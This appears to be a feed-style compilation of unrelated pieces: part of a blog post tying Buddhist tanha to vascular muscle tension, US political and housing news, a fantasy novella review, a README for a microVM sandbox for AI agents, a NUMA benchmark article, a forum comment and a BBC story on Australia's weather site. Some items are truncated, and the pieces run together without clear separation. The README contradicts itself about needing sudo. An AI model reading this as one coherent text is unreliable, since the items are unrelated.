To summarize the story so far: tanha is a grabby reflex which is the source of most moment-by-moment suffering. The ‘tanha as unskillful active inference’ (TUAI) hypothesis suggests that we can think of this “grabbing” as part of the brain’s normal predictive and compressive sensemaking, but by default it makes many unskillful predictions that can’t possibly come true and must hold in a costly way. The vascular clamp hypothesis (VCH) is that we store these predictions (both skillful and unskillful) in vascular tension. The VCH can be divided into three distinct hypotheses (CVH, VCH, LHH) that describe the role of this reflex at different computational and temporal scales. An important and non-obvious aspect of smooth muscle (e.g. VSMCs) is they have a discrete “latch” setting wherein energy usage and flexibility drops significantly, and sometimes these latches are overly ‘sticky’; unlatching our sticky latches is a core part of the human condition.
Concluding Part I: the above work describes a bridge between three distinct levels of abstraction: a central element in Buddhist phenomenology, the core accounting system within active inference, and a specific muscular reflex. I think this may offer a functional route to synthesize the FEP-AI paradigm and Michael Levin’s distributed stress minimization work, and in future posts I plan to explore why this mechanism has been overlooked, and how its dynamics are intimately connected with human problems and capacities.
I view this research program as integral to both human flourishing and AI alignment.
Acknowledgements: This work owes a great deal to Romeo Stevens’ scholarship on tanha, pioneering tanha as a ‘clench’ dynamic, intuitions about muscle tension and prediction, and notion that we commit to dukkha ourselves until we get what we want; Nick Cammarata’s fresh perspectives on Buddhism and his tireless and generative inquiry around the phenomenology & timescale of tanha; Justin Mares’ gentle and persistent encouragement; Andrea Bortolameazzi’s many thoughtful comments and observations about the path, critical feedback, and thoughtful support; and Adam Safron’s steadfast belief and support, theorizing on SOHMs, and teachings about predictive coding and active inference. Much of my knowledge of Buddhist psychology comes from the work and teachings of Anthony Markwell; much of my intuition around tantra and interpersonal embodiment dynamics comes from Elena Selezneva. I’m also grateful for conversations with Benjamin Anderson about emergence, to Curran Janssens for supporting my research, and to Ivanna Evtukhova for starting me on the contemplative path. An evergreen thank you to my parents for their unconditional support. Finally, a big thank-you to Janine Leger and Vitalik Buterin’s Zuzalu co-living community for creating a space to work on this writeup and make it real.
Footnotes:
[1] We might attempt to decompose the Active Inference – FEP term of ‘precision weighting’ as (1) the amount of sensory clarity (the amount of precision available in stimuli), and (2) the amount of ‘grabbiness’ of the compression system (the amount of precision we empirically try to extract). Perhaps we could begin to put numbers on tanha by calculating the KL divergence between these distributions.
[2] We can speculate that the arrow of compression points away from Buddhism’s three attributes: e.g. the brain tries to push and prod its SOHMs toward patterns that are stable (dissonance minimization), satisfactory (harmony maximization), and controllable (compression maximization) — similar yet subtly distinct targets. Thanks to both Romeo and Andrea for discussion about the three attributes and their opposite.
[3] (Added July 19, 2023) Skeletal muscle, smooth muscle, and fascia (which contains myofibroblasts with actin fibers similar to those in muscles) are all found throughout the body and reflexively distribute physical load; it’s likely they do the same for cognitive-emotional load. Why focus on VSMCs in particular? Three reasons: (1) they have the best physical access to neurons, (2) they regulate bloodflow, and (3) they have the latch-bridge mechanism. I.e. skeletal, non-VSMC smooth muscle, and fascia all likely contribute significantly to distributed stress minimization, and perhaps do so via similar principles/heuristics, but VSMCs seem to be the only muscle with means, motive, and opportunity to finely puppet the neural system, and I believe are indispensably integrated with its moment-by-moment operation in more ways than are other contractive cells. (Thanks to @askyatharth for bringing up fascia.)
Edit, April 6th, 2025: a friendly Buddhist scholar suggests that common translations of taṇhā conflate two concepts: taṇhā in Pali is most accurately translated as craving or thirst, whereas the act of clinging itself is “upādāna (as in the upādāna-khandhās), and in the links of dependent origination is one step downstream from the thirst (or impulsive craving) of taṇhā.” Under this view we can frame taṇhā as a particular default bias in the computational-biochemical tuning of the human nervous system, and upādāna as the impulsive physical (VSMC) clenching this leads to.
Buddhism describes taṇhā as being driven by the three fundamental defilements, greed, fear, & delusion; I expect each defilement maps to a hard truth (aka clearly suboptimal but understandable failure mode) of implementing vasocomputation-based active inference systems.
Sanders, Warren Help Form Senate Democratic ‘Fight Club’ Challenging Schumer’s Leadership
Senators Bernie Sanders and Elizabeth Warren | CNN
Angered by the Democratic leadership’s fecklessness and lack of a bold vision for the future, a group of senators including Bernie Sanders of Vermont and Elizabeth Warren of Massachusetts has formed an alliance to push back on Senate Minority Leader Chuck Schumer and the party’s campaign arm ahead of next year’s critical midterm elections.
The existence of the group, known as the “Fight Club,” was first revealed Monday by the New York Times, which reported that the senators are pressing the Democratic Party to “embrace candidates willing to challenge entrenched corporate interests, fiercely oppose the Trump administration, and defy their own party’s orthodoxy.”
Sens. Chris Van Hollen of Maryland, Tina Smith of Minnesota, and Chris Murphy of Connecticut are also members of the alliance, and other senators—including Ed Markey of Massachusetts and Jeff Merkley of Oregon—have taken part in group actions, according to the Times.
“The coalition of at least half a dozen senators... is unhappy with how Mr. Schumer and his fellow senator from New York, Kirsten Gillibrand, the head of Senate Democrats’ campaign arm, have chosen, recruited and, they argue, favored candidates aligned with the establishment,” the newspaper reported. “The party’s campaign arm, the Democratic Senatorial Campaign Committee, has not made any formal endorsements in contested primaries. However, the senators are convinced that it is quietly signaling support for and pushing donors toward specific Senate candidates: Rep. Angie Craig in Minnesota, Rep. Haley Stevens in Michigan, and Gov. Janet Mills in Maine.”
Members of the “Fight Club” have endorsed Minnesota Lt. Gov. Peggy Flanagan’s bid for US Senate. In addition to Flanagan, Sanders has backed Abdul El-Sayed’s US Senate run in Michigan and Graham Platner’s campaign to unseat Republican Sen. Susan Collins in Maine.
News of the “Fight Club” alliance comes after a small group of centrist Democrats, with Schumer’s tacit blessing, capitulated to President Donald Trump and Republicans earlier this month by agreeing to end the government shutdown without an extension of Affordable Care Act subsidies, even as health insurance premiums skyrocket nationwide.
The cave sparked widespread fury, much of it directed at Schumer. Indivisible, a progressive advocacy group that typically aligns with Democrats, has said it will not support any Senate Democratic primary candidate who does not call on Schumer to step down as minority leader.
“We must turn the page on this era of cowardice,” Indivisible said following Senate Democrats’ capitulation. “We must nominate and elect Democratic candidates who have an actual backbone. And we must ensure that the kind of failed leadership we see from Sen. Schumer does not doom a future Democratic majority.”
Thus far, no sitting member of the Senate Democratic caucus has demanded Schumer’s resignation. But the emergence of the “Fight Club” is the latest evidence that the Democratic leader’s support is beginning to crumble.
“Absolutely love to see this,” progressive strategist Robert Cruickshank wrote on social media in response to the Times reporting. “So glad there are some Senate Dems willing to fight back.”
Jake Johnson is a senior editor and staff writer for Common Dreams.
20 States Sue the Trump Administration Over Cuts to Homeless Permanent Housing Funding
Portside
portside.org
2025-11-27 05:34:55
...
The new conditions placed on the program would also give HUD the ability to deny funding for organizations that acknowledge the existence of transgender or nonbinary individuals.
“Communities across the country depend on Continuum of Care funds to provide housing and other resources to our most vulnerable neighbors,” said James in a press release. “These funds help keep tens of thousands of people from sleeping on the streets every night. I will not allow this administration to cut off these funds and put vital housing and support services at risk.”
The coalition of mainly Democratic-led states argues in the lawsuit that HUD’s new conditions on the funding are “unlawful and unconstitutional,” alleging that the administration “cannot impose its own conditions on funds that Congress mandated should be distributed based solely on need.”
The lawsuit accuses the Trump administration of violating the Administrative Procedure Act and Congress’ “constitutional power to control spending.”
“HUD is dismayed that the plaintiffs have chosen to misuse the Courts and pursue this delaying tactic to serve their own personal political agenda at the expense of the homeless individuals, youth and families now living on our Nation’s streets. Their use of the courts for political means seeks to prevent nearly $4 billion of aid to flow nationwide to assist those in need. HUD intends to mount a vigorous defense to this meritless legal action,” a HUD spokesperson said in a statement.
The case was filed in the U.S. District Court for the District of Rhode Island and will be decided by Judge Mary S. McElroy, who was appointed by President Donald Trump in 2019 but first nominated by former President Barack Obama.
Earlier this month, HUD imposed a cap on the amount of program funds that can support permanent housing. Previously, there was not a specific limit and around 90 percent of funds supported permanent housing. Under the new cap, no more than 30 percent of these funds can support permanent housing.
HUD Secretary Scott Turner has argued that the policy change is a necessary shift from what the Trump administration considers to be a failed “housing first” model that prioritizes permanent housing without preconditions, such as getting a job or seeking treatment. The agency has said the current policy has fueled a “homeless industrial complex” and does not address the root causes of homelessness.
“What we’ve done is take this Biden-era slush fund, called the Continuum of Care, and turned it into not just housing, but also treatment and transitional housing,” Turner said on Fox Business last week.
The funding cuts could put 170,000 people at risk of experiencing homelessness, according to internal HUD documentation previously obtained by POLITICO. HUD has maintained that the changes will include specific protections for children, veterans and seniors.
Different factions of lawmakers have sent letters to the agency with multiple requests, including extending funding for CoC projects expiring in 2026, reversing the policy changes or answering various questions about implementation.
Additionally, 1,001 national, state and local organizations sent a letter to Congress on Monday urging that lawmakers include language directing HUD to renew all existing CoC program grants expiring in 2026 for a full year in the upcoming Transportation-Housing and Urban Development appropriations bill.
A group of 22 House Republicans asked for the same one-year funding extension in a letter to the agency earlier this month.
In letters to HUD, House and Senate Democrats have urged the agency to rescind the policy change, submit documentation on how it will complete the quick application turnaround for housing project funding, and extend funding for grants expiring in 2026.
Senate Banking ranking member Elizabeth Warren (D-Mass.) said in a statement that Trump’s “draconian changes to the Continuum of Care program could force 170,000 people out of permanent housing and back onto the street. Congress, state leaders, all of us should be pushing back against the Administration’s cruel move that will dramatically exacerbate the homelessness crisis in cities, towns, and suburbs across the country.”
Rep. Mike Flood (R-Neb.), chair of the House Financial Services Subcommittee on Housing and Insurance, said that while he doesn’t typically discuss pending litigation, he’s “been working with the administration on policy to build more housing, drive housing costs down, and ensure that existing federal funds are spent in a way that rewards success and drives positive results for the American people.”
Other states included as plaintiffs in the lawsuit are Arizona, California, Colorado, Connecticut, Delaware, Illinois, Kentucky, Maine, Maryland, Massachusetts, Michigan, Minnesota, New Jersey, Oregon, Pennsylvania, Rhode Island, Vermont, Washington and Wisconsin, as well as the District of Columbia.
Katherine Hapgood reports on economic and small business policy in Congress at POLITICO.
Russ Allbery: Review: A Matter of Execution
PlanetDebian
www.eyrie.org
2025-11-27 05:34:00
Review: A Matter of Execution, by Nicholas & Olivia Atwater
Series: Tales of the Iron Rose #0
Publisher: Starwatch Press
Copyright: 2024
ISBN: 1-998257-08-8
Format: Kindle
Pages: 131
A Matter of Execution is the introductory novella that kicked off the Tales of the Iron Rose series. It is steampunk fantasy with airships. I previously read and reviewed the subsequent novel, Echoes of the Imperium.
As noted in that review, I read the novel first. That was a mistake; this is a much better place to start. A Matter of Execution was clearly intended as the introduction of all of these characters. More importantly, I think reading the novella first would have given me enough affinity with the characters to not mind the worst part of Echoes of the Imperium: the extremely slow first half that seemed filled with the protagonist's impostor syndrome.
A Matter of Execution opens, fittingly, with Captain William Blair, a goblin, former Imperial soldier, Oathbreaker, and series first-person protagonist being carted to his execution. He is not alone; in the same prison wagon is an arrogant (and racist) man named Strahl, the killer of one of the rulers of Lyonesse.
Strahl is rather contemptuous of Blair's claim to be a captain, given that
he's both a goblin and an Oathbreaker. Strahl quickly revises that opinion
when Blair's crew, somewhat predictably given that he is the series
protagonist, creates a daring escape for both of them. The heat of action
gives both a chance to gain some respect for the other, which explains why
Blair is not only willing to invite Strahl to join his crew, but to go
back for Strahl's companion.
Breaking out Strahl's companion will be a more difficult, and surprising,
problem.
Nicholas Atwater is a role-playing game GM, something that you will learn in the "about the author" section at the end of this novella but probably will have guessed by then. Even more than Echoes of the Imperium, this novella feels like a (good) write-up of an RPG adventure. A wildly varied cast of characters come together and form a party with a well-defined objective that has some surrounding mysteries and surprises. Each of those characters gets their individual moments to show off their specific skills. Readers with a certain gaming background will know exactly where to insert the Borderlands-style title card with a slightly demented description of each character.
This is not a complaint. You may be able to see the bones of the setup
adventure for a long-running campaign, but I like this style of character
introduction and the story moves right along. There are a ton of varied
characters, some interesting villains and maybe-villains, a rather
satisfying heist setup, and some good chemistry and a bit of banter. This
is not a deep story — it's clearly an introductory episode for both the
characters and the world background — but it's a fun way to spend a few
hours.
I think the best part of this series is the world-building. If you have read my review of Echoes of the Imperium, you have unfortunately been mildly spoiled for the revelation in this novella. I don't think it hurt the story that much; you will be able to predict what obvious gaps in the novel backstory the novella is going to fill in, but it's just as enjoyable to see how that happens. But the Atwaters aren't going to drop any of the big world-building bombs in the introductory novella, of course. Instead, you get a gradual introduction to the nature of magic in this world, some of the political setup of the recent war, and a quick introduction to the capabilities of Strahl's mysterious companion.
If you've not yet read this series, I recommend starting here. It's a
quick investment to see if you'll be interested. The novel is heavier and
slower, and the pacing of the first half isn't great, but the
world-building is even better.
If you've already read the novel, this is still worth reading as long as you enjoyed it. You'll have a few moments of "oh, that's how that happened," and it's a fun and fast-moving way to spend a bit more time with the characters.
Followed by Echoes of the Imperium. The back matter of the novella says that The Winds of Fortune is supposedly forthcoming.
Rating: 7 out of 10
Reviewed: 2025-11-26
Show HN: Era – Open-source local sandbox for AI agents
Run untrusted or AI-generated code locally inside microVMs that behave like containers for great devX, 200ms launch time, and better security.
There's a fully managed cloud layer (a globally deployed Worker/API); jump to cloudflare/README.md.
Quick Start
installation options
option 1: homebrew (recommended)
# 1. install the tap
brew tap binsquare/era-agent-cli
# 2. install era agent
brew install binsquare/era-agent-cli/era-agent
# 3. install dependencies
brew install krunvm buildah
# 4. verify the CLI is on PATH
agent vm exec --help
# 5. follow platform-specific setup (see below)
option 2: from source
# 1. install dependencies
brew install krunvm buildah # on macos
# 2. clone the repository
git clone https://github.com/binsquare/era
cd era-agent
# 3. build the agent
make
# 4. follow platform-specific setup (see below)
Installation (macOS)
brew tap binsquare/era-agent-cli
brew install era-agent-cli
brew install krunvm buildah
Run the post-install helper to prepare the case-sensitive volume/state dir on macOS:
$(brew --prefix era-agent)/libexec/setup/setup.sh
platform setup details
homebrew installation setup
if you installed era agent via homebrew, use the setup script from the installed location:
# for macos users with homebrew installation
$(brew --prefix era-agent)/libexec/setup/setup.sh
# or run the setup script directly after installation
$(brew --prefix)/bin/era-agent-setup # if setup script is linked separately
macos setup
Run scripts/macos/setup.sh to bootstrap dependencies, validate (or create) a case-sensitive volume, and prepare an agent state directory (the script may prompt for your password to run diskutil). The script will also detect your Homebrew installation and recommend the correct value for the DYLD_LIBRARY_PATH environment variable, which may be required for krunvm to find its dynamic libraries.
If you prefer to create the dedicated volume manually, open a separate terminal and create the volume with diskutil (with sudo as required), replacing disk3 with the identifier reported by diskutil list. The operation is non-destructive, does not require sudo, and shares space with the source container volume.
When prompted by the setup script, accept the default mount point (/Volumes/krunvm) or provide your own. Afterwards, export the environment variables printed by the script (at minimum AGENT_STATE_DIR, KRUNVM_DATA_DIR, and CONTAINERS_STORAGE_CONF) before invoking agent or running krunvm/buildah directly. The helper now prepares a matching container-storage configuration under the case-sensitive volume so the CLI can run without extra manual steps.
The script also writes policy.json/registries.conf under the same directory so Buildah doesn't look for root-owned files in /etc/containers. Export the variables it prints (CONTAINERS_POLICY, CONTAINERS_REGISTRIES_CONF) if you invoke Buildah manually.
Linux Setup
Install krunvm and buildah using your package manager (the specific installation method may vary)
Ensure the system is properly configured to run microVMs (may require kernel modules or specific privileges)
Consider setting AGENT_STATE_DIR to a writable location if running as non-root
Runtime Requirements
krunvm must be installed and available on $PATH (Homebrew: brew install krunvm; see upstream docs for other platforms).
buildah must also be present because krunvm shells out to it for OCI image handling.
On macOS, krunvm requires a case-sensitive APFS volume; see the macOS setup notes above.
Build
make # builds the agent CLI
make clean # removes build artifacts (Go cache)
Full platform-specific steps (macOS volume setup, Linux env vars, troubleshooting) live in era-agent/README.md.
🎥 Demo Video
A demo video showing how to install and use the CLI tool is available in the
era-agent directory
. This video covers:
Installing dependencies and compiling the CLI tool
Creating and accessing local VMs
Running code and agents through commands or scripts
Uploading and downloading files to/from a VM
Core Commands
# create a long-running VM
agent vm create --language python --cpu 1 --mem 256 --network allow_all
# run something inside it
agent vm exec --vm <id> --cmd "python -c 'print(\"hi\")'"
# ephemeral one-off execution
agent vm temp --language javascript --cmd "node -e 'console.log(42)'"
# inspect / cleanup
agent vm list
agent vm stop --all
agent vm clean --all
Supported --language values: python, javascript/node/typescript, go, ruby. Override the base image with --image if you need a custom runtime.
⚙ Configuration Highlights
AGENT_STATE_DIR: writable directory for VM metadata, krunvm state, and Buildah storage. The macOS setup script prints the correct exports.
AGENT_LOG_LEVEL (debug|info|warn|error) and AGENT_LOG_FILE: control logging.
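Since the sandbox is aimed at AI agents, a harness will usually drive the CLI programmatically rather than by hand. Below is a minimal Python sketch that shells out to the agent commands and environment variables documented above; the state directory path, the log level, and the command run inside the VM are illustrative placeholders, not part of the project.

import os
import subprocess

def run_in_temp_vm(language: str, cmd: str) -> str:
    # Run a one-off command in an ephemeral Era microVM via the `agent` CLI.
    # Assumes the CLI is installed and on PATH; the flags (vm temp --language --cmd)
    # and env vars (AGENT_STATE_DIR, AGENT_LOG_LEVEL) are the ones documented above.
    env = dict(os.environ,
               AGENT_STATE_DIR="/tmp/era-state",  # placeholder state directory
               AGENT_LOG_LEVEL="info")
    result = subprocess.run(
        ["agent", "vm", "temp", "--language", language, "--cmd", cmd],
        capture_output=True, text=True, check=True, env=env,
    )
    return result.stdout

if __name__ == "__main__":
    # Hypothetical usage: execute untrusted Python inside the sandbox.
    print(run_in_temp_vm("python", "python -c 'print(\"hi from the microVM\")'"))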
In New York, one of the toughest challenges that Mayor-elect Zohran Mamdani faces will be preserving and increasing the supply of affordable housing. Same story in Boston, where I live and where our progressive mayor, Michelle Wu, is constrained by similar forces.
The immediate obstacles are a scarcity of buildable land and subsidy dollars. In both cities, higher taxes to support more housing require the approval of state government.
New York has a form of rent control, known as rent stabilization, but most New Yorkers do not live in rent-stabilized apartments. Boston once had rent control, but the state legislature took it away in 1994. Local option rent control will be back before voters next year via a ballot initiative.
But behind all of these challenges is the sheer political power of developers. Let me give a couple of emblematic examples.
Thirty years ago, Boston had massive tracts of vacant developable land in a part of the waterfront that was a jumble of parking lots, warehouses, and piers. It had not been developed partly because its ownership was patchwork, and partly because Boston was still emerging from a prolonged recession.
The land area totaled about 1,000 acres, only slightly less than Boston’s entire historic downtown. It represented the city’s last large-scale building opportunity.
The Boston Redevelopment Authority (BRA) gradually got control of the land, rebranded it as the Seaport District, then as the Innovation District, and in 1999 began working with private developers to create a whole new section of the city with hotels, office buildings, restaurants, and luxury housing. Number of affordable housing units: fewer than 500.
Why? Because the BRA and the two mayors of that era, Tom Menino (1993–2014) and Marty Walsh (2014–2021), were close allies of developers, and luxury pays. The total public subsidy for the Seaport/Innovation District is hard to calculate, because it is a mix of land assembly, roads, infrastructure, and tax breaks, but it easily runs into the billions. Think of the affordable housing that might have been built.
In addition to being a case study of how not to develop affordable housing, the Innovation District is a case study of how not to do transportation and climate remediation. It is exactly at sea level, and the city imposed hardly any building standards to protect against sea level rise. Thus its nickname: The Inundation District. And no subway line was extended to the new district, creating parking problems.
This all occurred not because planners are stupid. It occurred because of the political power of developers.
Now, Boston finally has a mayor who is not in the pocket of developers, Michelle Wu. But that one last giant tract is pretty well filled up.
Developers were so anxious about not having an ally in City Hall that they poured money into the campaign of billionaire Josh Kraft, a carpetbagger from the suburbs whom Wu so thoroughly trounced in the September preliminary election that he dropped out before the November final.
But winning an election overwhelmingly is not the same as having adequate resources. And even if developers no longer control City Hall, they pretty well control the legislature. So Boston is unlikely to get the taxing resources that it needs to build more affordable housing.
IN NEW YORK, THERE IS NOTHING QUITE COMPARABLE to the Seaport District, but a wasted opportunity on a smaller scale is the development called Hudson Yards on the far West Side of Manhattan. Built on giant platforms over rail lines, the heart of Hudson Yards is a giant indoor mall plus luxury housing.
Think about New York City for a minute. One of its many great qualities is the street-level retail of all kinds. New York needs a suburban-style indoor shopping mall like the proverbial bull needs proverbial teats. Plus, the region already has them: It’s called New Jersey.
But there was money to be made, so in 2005 the city cut a deal (finalized by the city council in 2013) with billionaire Steve Ross and his Related Companies to develop Hudson Yards with a total of 13,500 housing units, of which some 4,000 were to be affordable. In the end, only about 600 affordable units were produced. The average Hudson Yards condo in 2025 has sold for $7.4 million.
At the time, the mayor was (of course) Michael Bloomberg, a civic liberal in some respects but the ultimate ally of real estate developers.
Here is another telling irony. One of the nearby public amenities that makes Hudson Yards and the surrounding areas so commercially valuable is a wonderful quirky walkway called the High Line. It began life as an abandoned elevated railroad track. When I lived in West Greenwich Village as a young writer, it went right through my neighborhood.
In the 1990s, a local group, Friends of the High Line, came up with the improbable idea of developing it into a greened pathway. They persuaded very skeptical city officials to let them try, and the idea has succeeded spectacularly. The High Line is now a charming elevated park. It is so attractive that luxury housing has been built all along it, and it is one of the attractions of the nearby Hudson Yards.
So something that began as a loving, volunteer civic endeavor has become one more subsidy to billionaires. The ghost of the economist Henry George would understand. He proposed a tax on the unearned increment in land values.
There is a second phase of Hudson Yards still in the planning stage. The original developer bailed out, and various city agencies are still in final negotiations with the latest developer. The city has spent billions in various subsidies for Hudson Yards. Here is where Mayor-elect Mamdani comes in. He could demand a lot more affordable housing.
THERE IS ONE MORE WAY THAT DEVELOPERS have choked off the supply of affordable housing in places like Boston and New York. That is by converting subsidized apartments intended for low- or middle-income people into luxury housing. Many federal programs allow this to be done as soon as the original mortgage is paid off.
In New York, many moderate-income complexes built with tax subsidies, such as Stuyvesant Town and Peter Cooper Village, have been converted to luxury housing. Likewise for many New York apartments built as middle-class housing under a city-state program that used tax-exempt bonds and loans with low interest rates, called the Mitchell-Lama program.
One of the prime offenders, who got very rich converting Mitchell-Lama apartments, was a developer named … wait for it … Steve Witkoff. Yes, the same Trump crony who sold out middle-income New York renters is now reborn as Trump’s foreign-policy guy in charge of selling out Ukraine.
These conversions could not have been done without the approval of city officials. This is another reflection of the same political power of developers. The big developers were huge campaign contributors to the opponents of Mamdani because they appreciated that he could put a stop to this thievery. Let’s hope that he does.
Robert Kuttner is co-founder and co-editor of The American Prospect, and professor at Brandeis University’s Heller School. His latest book is Going Big: FDR’s Legacy, Biden’s New Deal, and the Struggle.
Evaluating Uniform Memory Access Mode on AMD's Turin
NUMA, or Non-Uniform Memory Access, lets hardware expose affinity between cores and memory controllers to software. NUMA nodes traditionally aligned with socket boundaries, but modern server chips can subdivide a socket into multiple NUMA nodes. It’s a reflection of how non-uniform interconnects get as core and memory controller counts keep going up. AMD designates their NUMA modes with the NPS (Nodes Per Socket) prefix.
NPS0 is a special NUMA mode that goes in the other direction. Rather than subdivide the system, NPS0 exposes a dual socket system as a single monolithic entity. It evenly distributes memory accesses across all memory controller channels, providing uniform memory access like in a desktop system. NPS0 and similar modes exist because optimizing for NUMA can be complicated and time intensive. Programmers have to specify a NUMA node for each memory allocation, and take care to minimize cross-node memory accesses. Each NUMA node only represents a fraction of system resources, so code pinned to a NUMA node will be constrained by that node’s CPU core count, memory bandwidth, and memory capacity. Effort spent getting an application to scale across NUMA nodes might be effort not spent on a software project’s other goals.
From AMD’s EPYC 9005 Series Architecture Overview, showing a dual socket Zen 5 (Turin) setup in NPS1 mode
A massive thank you goes to Verda (formerly DataCrunch) for providing an instance with 2 AMD EPYC 9575Fs and 8 Nvidia B200 GPUs. Verda gave us about 3 weeks with the instance to do with as we wished. While this article looks at the AMD EPYC 9575Fs, there will be upcoming coverage of the B200s found in the VM.
This system appears to be running in NPS0 mode, giving an opportunity to see how a modern server acts with 24 memory controllers providing uniform memory access.
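One quick way to check what the OS is actually exposing is to read the NUMA topology from Linux sysfs. Here is a minimal Python sketch (Linux only, assuming the standard /sys/devices/system/node layout); under NPS0 it should report a single node covering every CPU, while NPS1 on a dual socket board would report one node per socket.

from pathlib import Path

def numa_nodes():
    # Map node name -> CPU list by reading Linux sysfs.
    # Returns an empty dict on systems that don't expose it (e.g. macOS).
    base = Path("/sys/devices/system/node")
    return {
        node.name: (node / "cpulist").read_text().strip()
        for node in sorted(base.glob("node[0-9]*"))
    }

if __name__ == "__main__":
    topology = numa_nodes()
    if not topology:
        print("no NUMA topology exposed")
    for name, cpus in topology.items():
        print(f"{name}: CPUs {cpus}")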
A simple latency test immediately shows the cost of providing uniform memory access. DRAM latency rises to over 220 ns, giving a nearly 90 ns penalty over the EPYC 9355P running in NPS1 mode. It’s a high penalty compared to using the equivalent of NPS0 on older systems. For example, a dual socket Broadwell system has 75.8 ns of DRAM latency when each socket is treated as a NUMA node, and 104.6 ns with uniform memory access[1].
NPS0 mode does have a bandwidth advantage from bringing twice as many memory controllers into play. But the extra bandwidth doesn’t translate to a latency advantage until bandwidth demands reach nearly 400 GB/s. The EPYC 9355P seems to suffer when a latency test thread is mixed with bandwidth heavy ones. A bandwidth test thread with just linear read patterns can achieve 479 GB/s in NPS1 mode. However, my bandwidth test produces low values on the EPYC 9575F because not all test threads finish at the same time. I avoid this problem in the loaded memory latency test, because I have bandwidth load threads check a flag. That lets me stop all threads at approximately the same time.
Per-CCD bandwidth is barely affected by the different NPS modes. Both the EPYC 9355P and 9575F use “GMI-Wide” links for their Core Complex Dies, or CCDs. GMI-Wide provides 64B/cycle of read and write bandwidth at the Infinity Fabric clock. On both chips, each CCD enjoys more bandwidth to the system compared to standard “GMI-Narrow” configurations. For reference, a GMI-Narrow setup running at a typical desktop 2 GHz FCLK would be limited to 64 GB/s of read and 32 GB/s of write bandwidth.
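As a back-of-the-envelope check on those figures, the 64 GB/s read and 32 GB/s write limits imply 32 bytes per cycle of read and 16 bytes per cycle of write bandwidth for a GMI-Narrow link at a 2 GHz FCLK; the per-cycle widths below are inferred from the article's totals rather than taken from AMD documentation.

fclk_hz = 2e9                             # typical desktop Infinity Fabric clock
print(32 * fclk_hz / 1e9, "GB/s read")    # 64.0, matches the GMI-Narrow read limit
print(16 * fclk_hz / 1e9, "GB/s write")   # 32.0, matches the GMI-Narrow write limit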
Higher memory latency could lead to lower performance, especially in single threaded workloads. But the EPYC 9575F does surprisingly well in SPEC CPU2017. The EPYC 9575F runs at a higher 5 GHz clock speed, and DRAM latency is only one of many factors that affect CPU performance.
Individual workloads show a more complex picture. The EPYC 9575F does best when workloads don’t miss cache. Then, its high 5 GHz clock speed can shine. 548.exchange2 is an example. On the other hand, workloads that hit DRAM a lot suffer in NPS0 mode. 502.gcc, 505.mcf, and 520.omnetpp see the EPYC 9575F’s higher clock speed count for nothing, and the higher clocked chip underperforms compared to 4.4 GHz setups with lower DRAM latency.
SPEC CPU2017’s floating point suite also shows diverse behavior. 549.fotonik3d and 554.roms suffer in NPS0 mode as the EPYC 9575F struggles to keep itself fed. 538.imagick plays nicely to the EPYC 9575F’s advantages. In that test, high cache hitrates let the 9575F’s higher core throughput shine through.
NPS0 mode performs surprisingly well in a single threaded SPEC CPU2017 run. Some sub-tests suffer from higher memory latency, but enough other tests benefit from the higher 5 GHz clock speed to make up the difference. It’s a lesson about the importance of clock speeds and good caching in a modern server CPU. Those two factors go together, because faster cores only provide a performance advantage if the memory subsystem can feed them. The EPYC 9575F’s good overall performance despite having over 220 ns of memory latency shows how good its caching setup is.
As for running in NPS0 mode, I don’t think it’s worthwhile in a modern system. The latency penalty is very high, and bandwidth gains are minor for NUMA-unaware code. I expect those latency penalties to get worse as server core and memory controller counts continue to increase. For workloads that need to scale across socket boundaries, optimizing for NUMA looks to be an unfortunate necessity.
Again, a massive thank you goes to Verda (formerly DataCrunch) without which this article, and the upcoming B200 article, would not be possible!
Seems weird to say, but I've been posting here for seventeen years now. And in that time, can I say that the quality of the discourse has slipped some? Well... if I'm being honest, probably yeah. A little. But at the same time, I can honestly say that HN is still easily the best community of this sort on the 'net, at least that I'm aware of. OK, Lobste.rs has some merit, but the problem is that the community there is arguably still a little too small, and you just don't get the variety and volume of interesting discussion you get here. But the level of discourse is high there as well.
Anyway, I find HN to be a wonderful refuge from a lot of the absurdity that's "out there" and I will happily throw in my own "Thanks, guys!" to dang and tomhow. And to pg for starting this whole thing back in the day.
Happy Thanksgiving, everyone, and here's to more years to come!
$96M AUD revamp of Bom website bombs out on launch
Australia's beloved weather website got a makeover - and infuriated users
Getty Images
Farmers are angry - they argue the information they need is now hard to find
It was an unseasonably warm spring day in Sydney on 22 October, with a forecast of 39C (99F) - a real scorcher.
The day before, the state of New South Wales had reported its hottest day in over a century, a high of 44.8C in the outback town of Bourke.
But little did the team at the national Bureau of Meteorology foresee that they, in particular, would soon be feeling the heat.
Affectionately known by Australians as the Bom, the agency's long-awaited website redesign went live that morning, more than a decade after the last update.
Within hours, the Bom was flooded with a deluge of complaints. The hashtag #changeitback went viral.
Gripes ranged from the new colour scheme for the rain radar, to furious farmers and fishermen who could no longer put in GPS coordinates to find forecasts for a specific location.
And then, this week it was revealed that the site's redesign had cost about A$96.5m ($62.3m; £48m), 20 times more than the previously stated A$4.1m.
"First you violate expectations by making something worse, then you compound the injury by revealing the violation was both expensive and avoidable," psychologist and neuroscientist Joel Pearson told the BBC, explaining the public outrage.
"It's the government IT project equivalent of ordering a renovation, discovering the contractor has made your house less functional, and then learning they charged you for a mansion."
'Game of hide and seek'
A consensus was quickly clear: "Please bring back the previous format," one person summarised on social media.
"It's awful, the most useful features are gone and it's not user-friendly. A waste of taxpayer money," another added.
Others said the timing was poor: "Why change it on a day of severe weather?"
There were some fans, including one who posted: "I like the new site. The front page is much cleaner". But they were few and far between.
Less than 48 hours after the launch, the Bom released a list of tips on how to use the new site, but this was further mocked by disgruntled users.
"Terrible! You shouldn't need step-by-step instructions to navigate the site," one post read.
Social media has been flooded with complaints about the new site
The Bom, whose website draws more than 2.6 billion views a year, tried to explain that the site's refresh - prompted by a major cybersecurity breach in 2015 - was aimed at improving stability, security and accessibility. It did little to satisfy the public.
Some frustrated users turned to humour: "As much as I love a good game of hide and seek, can you tell us where you're hiding synoptic charts or drop some clues?"
Malcolm Taylor, an agronomist in Victoria, told the Australian Broadcasting Corporation (ABC) that the redesign was a complete disaster.
"I'm the person who needs it and it's not giving me the information I need," the plant and soil scientist said.
Others appeared to accept their fate: "I am sure we will get used to it but it is not intuitive at all."
Bureau of Meteorology
Many users say they found the old version easier to navigate
Exactly a week after the debacle, the acting head of the agency was forced to apologise. There were concerns that people had been underprepared for storms in Queensland because of the site's poor usability.
The outpouring prompted the federal government to issue a scathing rebuke of the Bom and order immediate changes to the site.
"The bureau clearly has work to do, in that it has lost community confidence in the new website," Energy Minister Chris Bowen said at the time.
